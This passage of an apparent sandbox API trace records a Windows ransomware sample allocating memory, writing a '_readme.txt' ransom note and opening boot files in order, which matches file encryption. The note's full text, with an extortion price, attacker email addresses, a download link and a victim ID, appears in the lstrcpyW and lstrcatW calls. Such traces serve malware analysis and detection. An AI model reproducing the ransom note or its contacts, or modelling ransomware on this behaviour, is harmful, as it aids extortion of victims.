RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.456] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0184.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.456] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.456] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.456] PathFindFileNameW (pszPath="") returned="" [0184.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.456] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.457] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0184.457] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0184.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.457] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.457] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0184.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.457] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0184.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0184.458] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.458] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0184.458] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0184.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0184.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.460] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*" (normalized: "c:\\boot\\zh-hk\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.461] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.461] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.461] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0184.461] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.464] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.464] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.466] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.466] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, 